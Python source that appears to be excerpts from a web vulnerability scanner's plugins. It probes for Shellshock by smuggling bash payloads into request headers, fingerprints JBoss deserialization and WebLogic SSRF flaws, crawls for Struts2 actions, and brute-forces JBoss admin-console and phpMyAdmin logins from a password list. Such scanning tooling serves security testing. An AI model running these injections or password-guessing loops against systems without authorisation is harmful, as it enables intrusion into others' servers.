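            module, path = entry.split('|')
            tm = http.httptest('https', '%s' % ip, port, path)
            if tm and tm[0] not in (404, 504, 502):
                return 'https', ip, str(port), path, module
            tm = http.httptest('http', '%s' % ip, port, path)
            if tm and tm[0] not in (404, 400, 504):
                return 'http', ip, str(port), path, module
        return '', ip, str(port), '', ''
    except Exception as e:
        print(e)
        return '', ip, str(port), '', ''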
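def verify(protocol, ip, port):
    """Probe the ``/cgi-bin/php*`` endpoints for Shellshock (bash function import).

    Three Bash function-definition strings are sent in the ``cookie``,
    ``User-Agent`` and ``Referrer`` request headers (a CGI server exports them
    as ``HTTP_*`` environment variables; the misspelt ``Referrer`` still
    becomes an environment variable, which is all that matters here).  Each
    string only echoes the marker ``hczjhdqtjh``; a hit is declared when that
    marker appears in the response *headers*, which is what the first
    probe's ``echo X-Bash-Test:`` produces.  No command beyond ``echo`` is
    executed.

    Fix over the published listing: when a request raised, the code fell
    through to ``res_header`` unbound and the resulting ``NameError`` ended
    the whole scan; a failed request now moves on to the next probe.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``.  On a hit ``url`` is the responding
        *path* (kept for compatibility; ``msg`` carries the full URL) and
        ``number`` is ``'v45'``; otherwise ``(False, base_url, 'v0', msg)``.
    """
    oldurl = protocol + '://' + ip + ':' + str(port)
    print('testing if shell shock vul')
    url_list = test_url(protocol, ip, port, timeout=10)
    marker = 'hczjhdqtjh'
    flag_list = [
        '() { :; }; echo; echo X-Bash-Test: hczjhdqtjh',
        'env x="() { :;}; echo hczjhdqtjh" bash -c "echo this is a test"',
        '() { :;};a="hczjhdqtjh";echo "a: $a"'
    ]
    try:
        for url in url_list:
            if 'cgi' not in url:
                continue
            for flag in flag_list:
                header = {
                    'cookie': flag,
                    'User-Agent': flag,
                    'Referrer': flag
                }
                try:
                    http = httpparse()
                    tm = http.httpreq('GET', protocol, ip, port, url, header=header)
                except Exception as e:
                    print(str(e))
                    continue
                if marker in str(tm[1]):
                    msg = 'There is shell shock vul on ' + oldurl + url + ' .'
                    return True, url, 'v45', msg
    except Exception as e:
        print(str(e))
    return False, oldurl, 'v0', 'There is no shell shock vul'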
def verify(protocol, ip, port):
    """Fingerprint CVE-2017-12149 (JBoss AS 6.x ``/invoker/readonly`` deserialization).

    Only a GET is sent: a 500 whose body mentions ``JBoss Web`` is taken as
    evidence that the HttpInvoker servlet is exposed.  No payload is
    delivered, so this is a fingerprint rather than an exploitation check.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; ``'v62'`` on a hit, ``'v0'`` otherwise;
        exceptions become ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if CVE-2017-12149 JBOSS AS 6.x unserialized vul')
    http = httpparse()
    try:
        resp = http.httpreq('GET', protocol, ip, port, '/invoker/readonly')
        exposed = resp[0] == 500 and re.search('JBoss Web', str(resp[2]), re.I)
    except Exception as e:
        return False, url, 'v0', str(e)
    if exposed:
        return True, url, 'v62', 'There is CVE-2017-12149 JBOSS AS 6.x unserialized vul on url: ' + url + ' .'
    return False, url, 'v0', 'There is no CVE-2017-12149 JBOSS AS 6.x unserialized vul'
def verify(protocol, ip, port):
    """Detect a Weaver e-Mobile back-office login page at ``/login.do``.

    This is a fingerprint only (200 plus ``e-Mobile`` in the body), reported
    with number ``'v21'``; no vulnerability is exercised.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; exceptions become ``(False, url, 'v0',
        str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    http = httpparse()
    print('testing if e-Mobile backstage')
    try:
        resp = http.httpreq('GET', protocol, ip, port, '/login.do')
        found = resp[0] == 200 and re.search(b'e-Mobile', resp[2], re.I)
    except Exception as e:
        return False, url, 'v0', str(e)
    if found:
        msg = 'e-Mobile backstage is:' + url + '/login.do'
        print(msg)
        return True, url, 'v21', msg
    return False, url, 'v0', 'Ther is no e-Mobile backstage'
def verify(protocol, ip, port):
    """Fingerprint CVE-2017-7504 (JBossMQ HTTP-IL ``HTTPServerILServlet`` deserialization).

    A GET to ``/jbossmq-httpil/HTTPServerILServlet`` must answer 200 with
    ``This is the JBossMQ HTTP-IL`` in the body and ``JBoss`` somewhere in the
    headers.  No payload is sent; a hit only means the servlet is exposed.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; ``'v61'`` on a hit, ``'v0'`` otherwise;
        exceptions become ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if CVE-2017-7504 JBOSSMQ JMS colony unserialized vul')
    http = httpparse()
    tag = 'This is the JBossMQ HTTP-IL'
    try:
        resp = http.httpreq('GET', protocol, ip, port, '/jbossmq-httpil/HTTPServerILServlet')
        exposed = (re.search(tag, str(resp[2]), re.I)
                   and resp[0] == 200
                   and re.search('JBoss', str(resp[1]), re.I))
    except Exception as e:
        return False, url, 'v0', str(e)
    if exposed:
        return True, url, 'v61', 'There is CVE-2017-7504 JBOSSMQ JMS colony unserialized vul on url: ' + url + ' .'
    return False, url, 'v0', 'There is no CVE-2017-7504 JBOSSMQ JMS colony unserialized vul'
def verify(protocol, ip, port):
    """Check whether the ``/status?full=true`` server-status page is exposed.

    A 200 whose body contains ``Max processing time`` and whose headers
    mention ``JBoss`` is reported as an information disclosure.  The number
    returned on a hit is ``'v91'``, which this listing also uses for the
    php-cgi probe — NOTE(review): confirm which module that id belongs to.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``; exceptions become ``(False, url, 'v0',
        str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if jboss information disclose vul')
    http = httpparse()
    tag = 'Max processing time'
    try:
        resp = http.httpreq('GET', protocol, ip, port, '/status?full=true')
        exposed = (re.search(tag, str(resp[2]), re.I)
                   and resp[0] == 200
                   and re.search('JBoss', str(resp[1]), re.I))
    except Exception as e:
        return False, url, 'v0', str(e)
    if exposed:
        return True, url, 'v91', 'There is jboss information disclose vul on url: ' + url + '/status?full=true.'
    return False, url, 'v0', 'There is no jboss information disclose vul'
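def verify(protocol, ip, port):
    """Brute-force the JBoss ``/admin-console`` (Seam) login as user ``admin``.

    ``/admin-console/index.seam`` must answer 200 with ``jboss`` somewhere in
    the response headers.  Each password from ``getpassdict()`` is POSTed to
    ``/admin-console/login.seam``; a body that does *not* contain
    ``attempt failed`` is treated as a successful login (``'v5'``) — a weak
    criterion, since any error page would also pass it.  The
    ``javax.faces.ViewState`` value is hard-coded to ``j_id4``; assumes the
    target accepts that state token — TODO confirm.

    Fixes over the published listing: the password list ``psw`` was never
    defined in this function (it is fetched through ``getpassdict()`` like the
    sibling probes); the password expression had been scrubbed to
    ``'******'`` (a syntax error); the loop returned after the *first* failed
    attempt, so only one password was ever tried; and the exception message
    was the literal ``'error'`` instead of ``str(e)``.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if JBOSS-adminConsole')
    http = httpparse()
    psw = getpassdict().get_pass_dict()
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/admin-console/index.seam')
        if not (re.search('jboss', str(tm[1]), re.I) and tm[0] == 200):
            return False, url, 'v0', 'The url:' + url + 'is not jboss'
        for password in psw:
            data = ('login_form=login_form&login_form%3Aname=admin&login_form%3Apassword='
                    + password
                    + '&login_form%3Asubmit=Login&javax.faces.ViewState=j_id4'
                    ).encode(encoding='utf-8')
            tm = http.httpreq('POST', protocol, ip, port, '/admin-console/login.seam', data=data)
            if not re.search(b'attempt failed', tm[2], re.I):
                msg = ('Found JBOSS-adminConsole! in url:' + url
                       + '/admin-console/index.seam with password: ' + password + '.')
                print(msg)
                return True, url, 'v5', msg
    except Exception as e:
        print(e)
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no JBOSS-adminConsole weakpass vul on url'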
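def verify(protocol, ip, port, probe_host='10.30.1.61'):
    """Check the WebLogic UDDI explorer (``SearchPublicRegistries.jsp``) for SSRF.

    The ``operator`` parameter is pointed at ``http://<probe_host>``; a
    vulnerable server fetches it and echoes ``Received a response from url:
    http://<probe_host> which did not have a valid SOAP`` in a 200 response.

    ``probe_host`` defaults to the original hard-coded ``10.30.1.61``, an
    RFC 1918 address that must actually answer HTTP for that error text to
    appear — an unreachable host produces a different message and therefore a
    false negative.  Pass an address you control where possible.  The
    expected text is matched literally (``re.escape``), so a host containing
    regex metacharacters cannot break the check.

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.
        probe_host: host the target is asked to fetch; keyword-only in spirit,
            added for compatibility with callers passing three positionals.

    Returns:
        ``(found, url, number, msg)``; ``'v60'`` on a hit, ``'v0'`` otherwise;
        exceptions become ``(False, url, 'v0', str(e))``.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if weblogic ssrf vul')
    http = httpparse()
    tag = 'Received a response from url: http://' + probe_host + ' which did not have a valid SOAP'
    path = ('/uddiexplorer/SearchPublicRegistries.jsp?operator=http://' + probe_host
            + '&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor='
            + '&selfor=Business+location&btnSubmit=Search')
    try:
        tm = http.httpreq('GET', protocol, ip, port, path)
        if tm[0] == 200 and re.search(re.escape(tag), str(tm[2]), re.I):
            return True, url, 'v60', 'There is weblogic ssrf vul on url: ' + url + ' .'
    except Exception as e:
        return False, url, 'v0', str(e)
    return False, url, 'v0', 'There is no weblogic ssrf vul'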
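def http_url(self, method, url, postdata='', header=None):
    """Issue a GET or POST through ``httpparse`` for an absolute or relative URL.

    Absolute ``url`` (starts with ``http``, case-insensitive): scheme, host
    and optional port are split out of it; the request path is the first path
    segment and everything after it (``/seg`` or ``/seg/...``), or ``/`` when
    the URL has no path or ends with ``/``.  The port defaults to 443 for
    https and 80 otherwise.  Relative ``url``: sent to ``self.protocol`` /
    ``self.ip`` / ``self.port`` as ``'/' + url``.

    ``header`` is only forwarded for GET and ``postdata`` only for POST, as in
    the original.  ``header`` now defaults to ``None`` (treated as ``{}``)
    rather than a shared mutable dict.

    Security fix: the first path segment is embedded in a regular expression.
    URLs reaching this method are harvested from scanned pages, so a segment
    containing regex metacharacters (``(``, ``?``, ``+`` ...) used to crash
    the scan with ``re.error`` or, for an unmatched pattern, ``AttributeError``
    on ``.group()``; the segment is now ``re.escape``d.

    Args:
        method: ``'GET'``; anything else is treated as POST.
        url: absolute or relative URL.
        postdata: POST body, forwarded only for POST.
        header: extra request headers, forwarded only for GET.

    Returns:
        ``(url_all, tm)`` — the absolute URL requested and the raw ``httpreq``
        result.
    """
    if header is None:
        header = {}
    http = httpparse()
    if not re.search('^http', url, re.I):
        url_all = self.protocol + '://' + self.ip + ':' + str(self.port) + '/' + url
        if method == 'GET':
            tm = http.httpreq('GET', self.protocol, self.ip, self.port, '/' + url, header=header)
        else:
            tm = http.httpreq('POST', self.protocol, self.ip, self.port, '/' + url, data=postdata)
        return (url_all, tm)

    url_all = url
    url_ele = url.split('/')
    scheme = url_ele[0].replace(':', '')
    if len(url_ele) > 3 and url_ele[-1] != '':
        seg = re.escape(url_ele[3])
        url_tail = re.search('/' + seg + '$|/' + seg + '/.*', url, re.I).group()
    else:
        url_tail = '/'
    if re.search(':', url_ele[2]):
        host = url_ele[2].split(':')[0]
        port = int(url_ele[2].split(':')[1])
    else:
        host = url_ele[2]
        port = 443 if re.search('^https', url, re.I) else 80
    if method == 'GET':
        tm = http.httpreq('GET', scheme, host, port, url_tail, header=header)
    else:
        tm = http.httpreq('POST', scheme, host, port, url_tail, data=postdata)
    return (url_all, tm)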
def run(self):
    """Crawl the target for Struts2 action URLs and run ``self.struts2`` on them.

    Steps (all inside one ``try`` whose handler only prints the error):

    1. Fetch ``/``.  On 301/302 the response headers are handed to
       ``self.newself``; otherwise a JavaScript ``location = '...'``
       assignment is searched for in the body and either followed through
       ``self.newself`` (when it contains ``http``) or appended to
       ``self.root_urls``.
    2. Each root URL is fetched; ``.action``/``.do`` links found in the page
       (``self.findaction``) and in its scripts (``self.actioninjs``) are
       collected in ``action_url``.
    3. Common names (``index.action``, ``login.do`` ...) are guessed at the
       site root and, when more than one root URL is known, under the
       directory of ``self.root_urls[1]``.
    4. The first action URL without a query string that answers with a
       usable status is passed to ``self.struts2``; the first non-empty
       result ends the scan.

    NOTE(review): the redirect target extracted from the *server's* body is
    followed blindly through ``self.newself``; a hostile target can steer the
    scanner at an arbitrary host.
    NOTE(review): ``rstrip(root_urls_ele[-1])`` strips a *character set*, not
    a suffix — e.g. ``'/a/b/file.do'.rstrip('file.do')`` also removes a
    trailing ``/`` and any ``d``/``e``/``f``/``i``/``l``/``o``/``.`` before it.
    NOTE(review): on 301/302 ``header='location'`` passes a string, not a
    dict, to ``httpreq`` — confirm that signature.
    NOTE(review): ``self.root_urls[1]`` raises ``IndexError`` when the list is
    empty; it is swallowed by the outer handler and the scan is abandoned.

    Returns:
        The dict returned by ``self.struts2`` for the first hit, or ``{}``.
    """
    action_url = []
    result = {}
    http2 = httpparse()
    #===Confirm root(location = ''/location = "")
    try:
        tm = http2.httpreq('GET', self.protocol, self.ip, self.port, '/')
        if tm[0] == 301 or tm[0] == 302:
            tm = http2.httpreq('GET', self.protocol, self.ip, self.port, '/', header='location')[1]
            self.newself(tm)
        else:
            # Neutralise "//...location" (e.g. in URLs) so the regex below only
            # sees real assignments.
            new_tm = re.sub(b'//.*location', b'//aa', tm[2])
            if re.search('location.*=\s*\'.*\'|location.*=\s*\".*\"', str(new_tm), re.I):
                locat_url_g = re.search(
                    'location.*=\s*\'(.*)\'|location.*=\s*\"(.*)\"', str(new_tm), re.I)
                # Group 1 is the single-quoted form, group 2 the double-quoted one.
                if locat_url_g.group(1) is None:
                    locat_url = locat_url_g.group(2)
                else:
                    locat_url = locat_url_g.group(1)
                if re.search('http', locat_url, re.I):
                    self.newself(locat_url)
                else:
                    self.root_urls.append(locat_url)
        #print self.protocol, self.ip, self.port, self.root_urls
        #===fetch self.root_urls for js and action/do
        for root_url in self.root_urls:
            if re.search('\.action|\.do', root_url, re.I):
                action_url.append(
                    re.search('.*\.action|.*\.do', root_url, re.I).group())
            tm = self.http_url('GET', root_url)[1]
            action_url = action_url + self.findaction(str(tm[2])) + self.actioninjs(str(tm[2]))
        print(self.ip, self.port, self.protocol, self.root_urls)
        #===guess index.action/login.action
        if len(self.root_urls) == 1:
            for m in [
                'index.action', 'index.do', 'login.action', 'login.do',
                'test.action', 'test.do', 'default.action', 'default.do'
            ]:
                if not re.search(m, str(action_url), re.I):
                    rp_code = http2.httpreq('GET', self.protocol, self.ip, self.port, '/' + m)[0]
                    if rp_code not in [401, 403, 404, 501, 502, 503, 504] and rp_code > 1:
                        action_url.append(m)
        else:
            root_urls_ele = self.root_urls[1].split('/')
            if re.search('\.', root_urls_ele[-1]):
                # Intended: drop the file name (see NOTE about rstrip above).
                root_path = self.root_urls[1].rstrip(root_urls_ele[-1])
            else:
                root_path = self.root_urls[1]
            if not re.search('/$', root_path):
                root_path = root_path + '/'
            for m in [
                'index.action', 'index.do', 'login.action', 'login.do',
                'test.action', 'test.do', 'default.action', 'default.do'
            ]:
                if not re.search(m, str(action_url), re.I):
                    rp_code = http2.httpreq('GET', self.protocol, self.ip, self.port, '/' + m)[0]
                    if rp_code not in [401, 403, 404, 501, 502, 503, 504] and rp_code > 1:
                        action_url.append(m)
                    rp_code = self.http_url('GET', root_path + m)[1][0]
                    if rp_code not in [401, 403, 404, 501, 502, 503, 504] and rp_code > 1:
                        action_url.append(root_path + m)
        print('>>>>>>>>>>>action_url:', action_url)
        #===Check St2
        for url in action_url:
            # URLs carrying a query string are skipped.
            if not re.search('=', url):
                rp_code = self.http_url('GET', url)[1][0]
                if rp_code not in [401, 403, 404, 501, 502, 503, 504] and rp_code > 1:
                    result = self.struts2(url)
                    if len(result) > 0:
                        break
    except Exception as e:
        print(str(e))
    return result
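def verify(protocol, ip, port):
    """Brute-force phpMyAdmin with a small user list and the shared password list.

    The login form is located at ``/`` or ``/phpmyadmin/`` (the body must
    contain ``input_password`` and ``name="token"``).  For every
    (user, password) pair a fresh cookie-aware opener fetches the form,
    extracts the CSRF ``token`` and POSTs the credentials; any of the
    ``flag_list`` markers in the response marks a successful login
    (``'v74'``).  Three ``URLError`` failures (which include ``HTTPError``)
    abort the run.

    Fixes over the published listing:
      * the login URL was built with a literal ``http://`` regardless of
        ``protocol``, so HTTPS targets were never actually tested;
      * the form fields were spliced into the body unencoded, so a password
        containing ``&``, ``=`` or ``%`` was silently corrupted — the body is
        now ``urllib.parse.urlencode``d;
      * both ``urlopen`` responses are closed instead of leaking sockets;
      * a failure while locating the form is printed rather than ignored
        (the brute force still proceeds against the base URL, as before).

    Args:
        protocol: ``'http'`` or ``'https'``.
        ip: target host.
        port: target port.

    Returns:
        ``(found, url, number, msg)``.
    """
    base = protocol + '://' + ip + ':' + str(port)
    url = base
    flag_list = [b'src="navigation.php', b'frameborder="0" id="frame_content"',
                 b'id="li_server_type">', b'class="disableAjax" title=']
    user_list = ['root', 'mysql', 'wwwroot', 'admin', 'zte']
    error_i = 0
    print('testing if phpmyadmin weak pass vul')
    http = httpparse()
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/')
        if b'input_password' in tm[2] and b'name="token"' in tm[2]:
            url = base + "/index.php"
        else:
            newtm = http.httpreq('GET', protocol, ip, port, '/phpmyadmin/')
            if b'input_password' in newtm[2] and b'name="token"' in newtm[2]:
                url = base + "/phpmyadmin/index.php"
            else:
                return False, url, 'v0', 'It is not phpmyadmin server on url:' + url + '.'
    except Exception as e:
        print(str(e))
    psw = getpassdict().get_pass_dict()
    token_re = re.compile('name="token" value="(.*?)" />')
    for user in user_list:
        for pass_ in psw:
            try:
                opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
                with opener.open(url, timeout=10) as page:
                    form = page.read().decode()
                # Missing token -> AttributeError, handled as "try the next pair".
                token = token_re.search(form).group(1)
                postdata = urllib.parse.urlencode([
                    ("pma_username", user),
                    ("pma_password", pass_),
                    ("server", "1"),
                    ("target", "index.php"),
                    ("lang", "zh_CN"),
                    ("collation_connection", "utf8_general_ci"),
                    ("token", token),
                ]).encode(encoding="utf-8")
                with opener.open(url, postdata, timeout=5) as res:
                    res_html = res.read()
                if any(flag in res_html for flag in flag_list):
                    msg = 'There is phpmyadmin weak pass vul on: %s , with username: %s and password: %s.' % (url, user, pass_)
                    print(msg)
                    return True, url, 'v74', msg
            except urllib.error.URLError as e:
                error_i += 1
                if error_i >= 3:
                    return False, url, 'v0', 'There is no phpmyadmin server on url:' + url + '.'
            except Exception as e:
                print(str(e))
    return False, url, 'v0', 'Therer is no phpmyadmin weakpass vul in url:' + url + '.'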